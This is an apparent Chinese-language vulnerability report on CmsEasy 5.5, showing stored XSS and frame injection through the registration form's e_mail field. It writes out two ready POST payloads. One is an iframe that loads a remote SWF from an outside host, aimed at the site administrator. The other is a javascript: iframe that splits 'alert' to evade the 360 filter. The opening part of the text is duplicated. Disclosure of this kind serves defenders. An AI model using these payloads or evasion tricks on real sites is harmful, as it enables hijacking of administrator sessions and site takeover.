### 简要描述: cmseasy 框架注入 可通过swf文件进行xss 跨后台 也可绕过360 直接xss ### 详细说明: 直接进入注册页面,然后发送数据包 url: http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818/uploads/index.php?case=user&act=register postdata: username=d1d1112d1d&password=111111&password2=111111&question=&answer=11111111&e_mail=admin%40admin.com'"><iframe src=http://sj.com/1.swf>&tel=010-10000000&address=admindasdada&verify=ssss&submit=+%E6%B3%A8%E5%86%8C+ 这里我们的1.swf就是一个远程的flash文件,由于这里的src有长度限制,不过不要紧,对于每一个xsser来说应该都有一个短域名,这里我就不赘述了,在swf里面可以写xss 然后进行通信,打管理员,swf内容我就不写了,我们看一下这个框架注入的dom是否已经被插入进去: [<img src="https://images.seebug.org/upload/201409/10111240cce5ddd5f0f7bf8dcfcaddc06b50edb1.png" alt="22.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/10111240cce5ddd5f0f7bf8dcfcaddc06b50edb1.png) 然后我们去后台看看该用户的信息: [<img src="https://images.seebug.org/upload/201409/10111351fac51a8894257fea18f40cd3d2d595f7.png" alt="23.png" width="600"...
### 简要描述: cmseasy 框架注入 可通过swf文件进行xss 跨后台 也可绕过360 直接xss ### 详细说明: 直接进入注册页面,然后发送数据包 url: http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818/uploads/index.php?case=user&act=register postdata: username=d1d1112d1d&password=111111&password2=111111&question=&answer=11111111&e_mail=admin%40admin.com'"><iframe src=http://sj.com/1.swf>&tel=010-10000000&address=admindasdada&verify=ssss&submit=+%E6%B3%A8%E5%86%8C+ 这里我们的1.swf就是一个远程的flash文件,由于这里的src有长度限制,不过不要紧,对于每一个xsser来说应该都有一个短域名,这里我就不赘述了,在swf里面可以写xss 然后进行通信,打管理员,swf内容我就不写了,我们看一下这个框架注入的dom是否已经被插入进去: [<img src="https://images.seebug.org/upload/201409/10111240cce5ddd5f0f7bf8dcfcaddc06b50edb1.png" alt="22.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/10111240cce5ddd5f0f7bf8dcfcaddc06b50edb1.png) 然后我们去后台看看该用户的信息: [<img src="https://images.seebug.org/upload/201409/10111351fac51a8894257fea18f40cd3d2d595f7.png" alt="23.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/10111351fac51a8894257fea18f40cd3d2d595f7.png) 这里我们继续看第二个方法,直接产生一个xss: url: http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818/uploads/index.php?case=user&act=register postdata: username=d111d111121d1d&password=111111&password2=111111&question=&answer=11111111&e_mail="><iframe src=javascript:a='al';b='ert';c='(1)';eval(a+b+c)>&tel=010-10000000&address=admindasdada&verify=ssss&submit=+%E6%B3%A8%E5%86%8C+ [<img src="https://images.seebug.org/upload/201409/101117281a6a2c66d6b1f2f56075b6c5f7ee9f85.png" alt="24.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/101117281a6a2c66d6b1f2f56075b6c5f7ee9f85.png) 在进入后台看看效果: [<img src="https://images.seebug.org/upload/201409/10111937de5d5558567e864ad91260076b4f72c7.png" alt="25.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/10111937de5d5558567e864ad91260076b4f72c7.png) 我们点击一下看看: 成功执行................. ### 漏洞证明: